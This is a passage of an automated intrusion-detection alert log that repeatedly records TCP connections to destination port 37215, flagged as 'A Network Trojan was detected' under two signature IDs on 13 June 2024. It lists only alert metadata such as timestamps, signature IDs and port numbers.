              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041859
              SID:2835222
              Source Port:45122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016797
              SID:2835222
              Source Port:37412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132950
              SID:2829579
              Source Port:38776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610174
              SID:2829579
              Source Port:32998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454426
              SID:2835222
              Source Port:37460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439908
              SID:2829579
              Source Port:43576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568511
              SID:2835222
              Source Port:58942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416124
              SID:2835222
              Source Port:58366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508321
              SID:2835222
              Source Port:53842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.975543
              SID:2835222
              Source Port:36318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108616
              SID:2835222
              Source Port:36884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.608088
              SID:2835222
              Source Port:55070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508153
              SID:2829579
              Source Port:41956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870521
              SID:2835222
              Source Port:46150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707374
              SID:2829579
              Source Port:38840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355774
              SID:2835222
              Source Port:55126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.790064
              SID:2835222
              Source Port:45452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.679570
              SID:2829579
              Source Port:51504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252479
              SID:2835222
              Source Port:52378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.754448
              SID:2829579
              Source Port:50722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109315
              SID:2835222
              Source Port:57838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506316
              SID:2835222
              Source Port:33166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.450610
              SID:2835222
              Source Port:58714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749930
              SID:2829579
              Source Port:40918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.831756
              SID:2835222
              Source Port:57954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.759283
              SID:2829579
              Source Port:54552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307117
              SID:2829579
              Source Port:60768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107513
              SID:2829579
              Source Port:59876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440315
              SID:2835222
              Source Port:35366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.565471
              SID:2835222
              Source Port:44806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.603987
              SID:2829579
              Source Port:33402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.073623
              SID:2829579
              Source Port:49094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175738
              SID:2835222
              Source Port:45676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545199
              SID:2835222
              Source Port:34364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317164
              SID:2835222
              Source Port:56812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696335
              SID:2829579
              Source Port:33290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153578
              SID:2829579
              Source Port:51786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227828
              SID:2835222
              Source Port:43560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991949
              SID:2835222
              Source Port:41286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415385
              SID:2835222
              Source Port:47372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731093
              SID:2829579
              Source Port:44254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889822
              SID:2835222
              Source Port:58532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610450
              SID:2829579
              Source Port:45482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.353081
              SID:2835222
              Source Port:51034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402026
              SID:2829579
              Source Port:60434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678381
              SID:2829579
              Source Port:55090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457813
              SID:2835222
              Source Port:50382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546096
              SID:2829579
              Source Port:35756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157583
              SID:2829579
              Source Port:40684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.085024
              SID:2835222
              Source Port:50884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.101135
              SID:2835222
              Source Port:58982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991463
              SID:2829579
              Source Port:37814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726494
              SID:2835222
              Source Port:43850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456095
              SID:2829579
              Source Port:44994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488163
              SID:2829579
              Source Port:48364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.101227
              SID:2829579
              Source Port:40926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356033
              SID:2829579
              Source Port:42184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077165
              SID:2829579
              Source Port:52446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256983
              SID:2835222
              Source Port:43786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.230640
              SID:2829579
              Source Port:39550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992877
              SID:2835222
              Source Port:51570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.155509
              SID:2835222
              Source Port:54870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248705
              SID:2835222
              Source Port:51562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612008
              SID:2835222
              Source Port:37440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076521
              SID:2829579
              Source Port:54702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195595
              SID:2829579
              Source Port:49666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.131031
              SID:2835222
              Source Port:48000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611209
              SID:2835222
              Source Port:42344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707823
              SID:2829579
              Source Port:43538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.322270
              SID:2829579
              Source Port:35774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.564201
              SID:2835222
              Source Port:49346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527581
              SID:2829579
              Source Port:34660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659362
              SID:2829579
              Source Port:35308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.196512
              SID:2829579
              Source Port:47108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.199817
              SID:2829579
              Source Port:42972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308885
              SID:2829579
              Source Port:48322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040148
              SID:2835222
              Source Port:36618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.173402
              SID:2835222
              Source Port:40326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567990
              SID:2835222
              Source Port:37778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275288
              SID:2835222
              Source Port:57036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213372
              SID:2829579
              Source Port:59638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.567737
              SID:2829579
              Source Port:33024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107237
              SID:2835222
              Source Port:33532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632500
              SID:2829579
              Source Port:41744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.244358
              SID:2829579
              Source Port:35992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301740
              SID:2829579
              Source Port:49444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.269314
              SID:2835222
              Source Port:38666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678717
              SID:2835222
              Source Port:40892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870849
              SID:2829579
              Source Port:49060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191177
              SID:2835222
              Source Port:48460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.997247
              SID:2829579
              Source Port:34688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093899
              SID:2835222
              Source Port:51916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755264
              SID:2835222
              Source Port:40232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.977422
              SID:2829579
              Source Port:37198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527989
              SID:2835222
              Source Port:58198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.866844
              SID:2835222
              Source Port:48514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.405911
              SID:2835222
              Source Port:40730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.374673
              SID:2829579
              Source Port:60222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754720
              SID:2829579
              Source Port:38146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.190891
              SID:2829579
              Source Port:58956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867615
              SID:2829579
              Source Port:42830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.267702
              SID:2829579
              Source Port:48536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420377
              SID:2835222
              Source Port:58594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869414
              SID:2829579
              Source Port:33794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805953
              SID:2835222
              Source Port:55346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.377108
              SID:2829579
              Source Port:44948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782947
              SID:2829579
              Source Port:59442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.994165
              SID:2835222
              Source Port:50282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277361
              SID:2829579
              Source Port:42672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889659
              SID:2835222
              Source Port:39770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569829
              SID:2829579
              Source Port:45878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456872
              SID:2829579
              Source Port:35734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657522
              SID:2829579
              Source Port:50700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440431
              SID:2829579
              Source Port:33892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224840
              SID:2835222
              Source Port:45386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.726684
              SID:2829579
              Source Port:37238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612903
              SID:2829579
              Source Port:40912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.154302
              SID:2829579
              Source Port:47158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941951
              SID:2829579
              Source Port:47546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438118
              SID:2829579
              Source Port:58082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215473
              SID:2829579
              Source Port:40034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.789158
              SID:2829579
              Source Port:33896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.909709
              SID:2835222
              Source Port:36380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197104
              SID:2829579
              Source Port:35620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344515
              SID:2829579
              Source Port:58632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695133
              SID:2829579
              Source Port:51828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659234
              SID:2829579
              Source Port:55280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.368643
              SID:2829579
              Source Port:33434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914722
              SID:2829579
              Source Port:46784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.378543
              SID:2829579
              Source Port:43918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659682
              SID:2829579
              Source Port:45544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.262846
              SID:2829579
              Source Port:55364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786043
              SID:2829579
              Source Port:51318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356909
              SID:2829579
              Source Port:36600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.937412
              SID:2829579
              Source Port:57902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128142
              SID:2829579
              Source Port:42874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573448
              SID:2835222
              Source Port:51780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.523492
              SID:2835222
              Source Port:47640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.271987
              SID:2835222
              Source Port:33792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888640
              SID:2835222
              Source Port:45994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752554
              SID:2829579
              Source Port:47644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805154
              SID:2829579
              Source Port:35554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566915
              SID:2829579
              Source Port:59548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.180159
              SID:2829579
              Source Port:59956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824131
              SID:2835222
              Source Port:48980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.096906
              SID:2835222
              Source Port:33958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613572
              SID:2835222
              Source Port:33720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.321525
              SID:2829579
              Source Port:51396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.655635
              SID:2835222
              Source Port:36156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.945844
              SID:2829579
              Source Port:36882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.174179
              SID:2835222
              Source Port:48926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610982
              SID:2829579
              Source Port:40172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.262733
              SID:2829579
              Source Port:60664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502228
              SID:2829579
              Source Port:47050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.085734
              SID:2835222
              Source Port:35732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193439
              SID:2829579
              Source Port:58690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.268409
              SID:2835222
              Source Port:43042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222430
              SID:2829579
              Source Port:41716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.556191
              SID:2835222
              Source Port:40402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572214
              SID:2835222
              Source Port:41160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545119
              SID:2835222
              Source Port:35910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.909011
              SID:2829579
              Source Port:40092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.702567
              SID:2835222
              Source Port:53846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130875
              SID:2835222
              Source Port:59052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438996
              SID:2835222
              Source Port:48680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170254
              SID:2835222
              Source Port:47996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.110135
              SID:2835222
              Source Port:40188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077435
              SID:2829579
              Source Port:54348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.271987
              SID:2829579
              Source Port:33792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355474
              SID:2835222
              Source Port:55770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502877
              SID:2829579
              Source Port:35274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229304
              SID:2829579
              Source Port:37914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229708
              SID:2829579
              Source Port:53780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.634491
              SID:2835222
              Source Port:46328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407753
              SID:2835222
              Source Port:46894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043888
              SID:2829579
              Source Port:40716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403028
              SID:2835222
              Source Port:56832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.654724
              SID:2835222
              Source Port:52046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730374
              SID:2835222
              Source Port:34618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545435
              SID:2835222
              Source Port:41012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438194
              SID:2835222
              Source Port:58622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.680652
              SID:2829579
              Source Port:41394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756839
              SID:2829579
              Source Port:59944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.973515
              SID:2829579
              Source Port:48086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841735
              SID:2829579
              Source Port:51162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487444
              SID:2829579
              Source Port:49812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127760
              SID:2835222
              Source Port:51722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.526167
              SID:2835222
              Source Port:59580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573154
              SID:2829579
              Source Port:42998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756056
              SID:2835222
              Source Port:38054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.343586
              SID:2829579
              Source Port:36328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757537
              SID:2829579
              Source Port:44464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.295057
              SID:2835222
              Source Port:54124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248723
              SID:2835222
              Source Port:42662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263292
              SID:2829579
              Source Port:41494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544465
              SID:2829579
              Source Port:33242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833602
              SID:2835222
              Source Port:47912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
